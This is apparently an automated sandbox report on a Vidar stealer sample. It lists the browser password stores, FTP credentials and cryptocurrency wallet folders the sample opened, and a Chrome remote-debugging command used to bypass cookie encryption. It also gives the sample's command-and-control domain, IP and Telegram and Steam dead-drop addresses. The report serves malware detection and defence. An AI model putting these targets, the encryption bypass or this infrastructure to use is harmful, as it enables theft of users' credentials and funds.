          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ngbtiladkrthgad.exe PID: 7304, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Attempt to bypass Chrome Application-Bound Encryption
          Source: C:\Users\user\Desktop\ngbtiladkrthgad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: ngbtiladkrthgad.exe PID: 7304, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Create Account          		1
          Extra Window Memory Injection          		1
          Obfuscated Files or Information          		1
          Credentials in Registry          		1
          Account Discovery          		Remote Desktop Protocol4
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager4
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Screen Capture          		1
          Remote Access Software          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Extra Window Memory Injection          		NTDS35
          System Information Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets1
          Query Registry          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Virtualization/Sandbox Evasion          		Cached Domain Credentials11
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Process Injection          		DCSync1
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ngbtiladkrthgad.exe75%VirustotalBrowse
          ngbtiladkrthgad.exe71%ReversingLabsWin32.Trojan.Generic
          ngbtiladkrthgad.exe100%AviraTR/AVI.vidar.xbpol

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.microsoft.cd0%Avira URL Cloudsafe
          http://e5.c.lencr.org/101.crl00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s.p.formaxprime.co.uk
          		78.47.63.132
          		truetrue
            		unknown
            plus.l.google.com
            		142.250.185.174
            		truefalse
              		high
              t.me
              		149.154.167.99
              		truefalse
                		high
                www.google.com
                		216.58.206.36
                		truefalse
                  		high
                  apis.google.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://t.me/g_etcontentfalse
                      		high
                      https://www.google.com/async/newtab_promosfalse
                        		high
                        https://www.google.com/async/ddljson?async=ntp:2false
                          		high
                          https://steamcommunity.com/profiles/76561199832267488false
                            		high
                            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                              		high
                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://t.me/ngbtiladkrthgad.exe, 00000000.00000002.1823139867.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://t.me/g_etcontentdqu220Mozilla/5.0ngbtiladkrthgad.exefalse
                                    		high
                                    https://duckduckgo.com/ac/?q=jmym7q.0.drfalse
                                      		high
                                      http://www.broofa.comchromecache_69.9.drfalse
                                        		high
                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drfalse
                                          		high
                                          https://web.telegram.orgngbtiladkrthgad.exe, 00000000.00000003.1194026711.000000000066C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.0000000000640000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1196269467.00000000006AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drfalse
                                              		high
                                              http://www.microsoft.cdngbtiladkrthgad.exe, 00000000.00000003.1194026711.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jmym7q.0.drfalse
                                                		high
                                                https://ac.ecosia.org?q=jmym7q.0.drfalse
                                                  		high
                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctangbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drfalse
                                                      		high
                                                      http://e5.i.lencr.org/0ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0ngbtiladkrthgad.exefalse
                                                            		high
                                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icongbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drfalse
                                                              		high
                                                              https://play.google.com/log?format=json&hasfast=truechromecache_69.9.drfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/v20ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drfalse
                                                                  		high
                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drfalse
                                                                    		high
                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYigdtrim.0.drfalse
                                                                      		high
                                                                      http://x1.c.lencr.org/0ngbtiladkrthgad.exe, 00000000.00000002.1825197872.000000000364C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.i.lencr.org/0ngbtiladkrthgad.exe, 00000000.00000002.1825197872.000000000364C000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://duckduckgo.com/chrome_newtabv20ngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drfalse
                                                                            		high
                                                                            http://e5.c.lencr.org/101.crl0ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchngbtiladkrthgad.exe, 00000000.00000002.1824410005.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, jmym7q.0.drfalse
                                                                              		high
                                                                              https://apis.google.comchromecache_69.9.drfalse
                                                                                		high
                                                                                http://e5.o.lencr.org0ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/products/firefoxgro.allngbtiladkrthgad.exe, 00000000.00000002.1825944490.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jmym7q.0.drfalse
                                                                                      		high
                                                                                      https://gemini.google.com/app?q=jmym7q.0.drfalse
                                                                                        		high
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94ngbtiladkrthgad.exe, 00000000.00000002.1823139867.000000000065B000.00000004.00000020.00020000.00000000.sdmp, ngbtiladkrthgad.exe, 00000000.00000003.1346023423.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, gdtrim.0.drfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.99
                                                                                          		t.meUnited Kingdom
                                                                                          		62041TELEGRAMRUfalse
                                                                                          78.47.63.132
                                                                                          		s.p.formaxprime.co.ukGermany
                                                                                          		24940HETZNER-ASDEtrue
                                                                                          216.58.206.36
                                                                                          		www.google.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          142.250.185.174
                                                                                          		plus.l.google.comUnited States
                                                                                          		15169GOOGLEUSfalse

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.4
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1637340
                                                                                          Start date and time:2025-03-13 14:48:47 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 28s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:15
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:ngbtiladkrthgad.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@22/22@6/6
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 67
                                                                                          • Number of non-executed functions: 49
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.186.142, 142.250.186.174, 108.177.15.84, 172.217.16.142, 142.250.186.110, 142.250.184.195, 172.217.18.110, 216.58.212.174, 142.250.181.234, 172.217.23.106, 216.58.206.74, 142.250.186.170, 142.250.184.234, 142.250.185.202, 216.58.206.42, 142.250.185.106, 142.250.185.170, 142.250.185.138, 142.250.186.138, 142.250.186.74, 142.250.184.202, 142.250.185.74, 216.58.212.138, 216.58.212.170, 199.232.214.172, 23.60.203.209, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          No simulations

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/img/emoji/40/F09F9889.png
                                                                                          http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                          • telegram.org/img/favicon.ico
                                                                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/
                                                                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/
                                                                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/
                                                                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/?setln=pl
                                                                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                          • telegram.org/
                                                                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                          • telegram.dog/
                                                                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                          • t.me/cinoshibot
                                                                                          78.47.63.132TEDGRQXB.exeGet hashmaliciousVidarBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            t.meCheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            http://khr.lfp.mybluehost.me/intesasanpaolo/web/login.phpGet hashmaliciousUnknownBrowse
                                                                                            • 50.6.3.255
                                                                                            https://khr.lfp.mybluehost.me/intesasanpaolo/web/login.php/Get hashmaliciousUnknownBrowse
                                                                                            • 50.6.3.255
                                                                                            Launcher.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                            • 149.154.167.99
                                                                                            Aura.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            ca703fd579bbcee73544b9b37f8a6469.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            DEVM24-clean.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99
                                                                                            kumori.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 149.154.167.99

                                                                                            ASNs

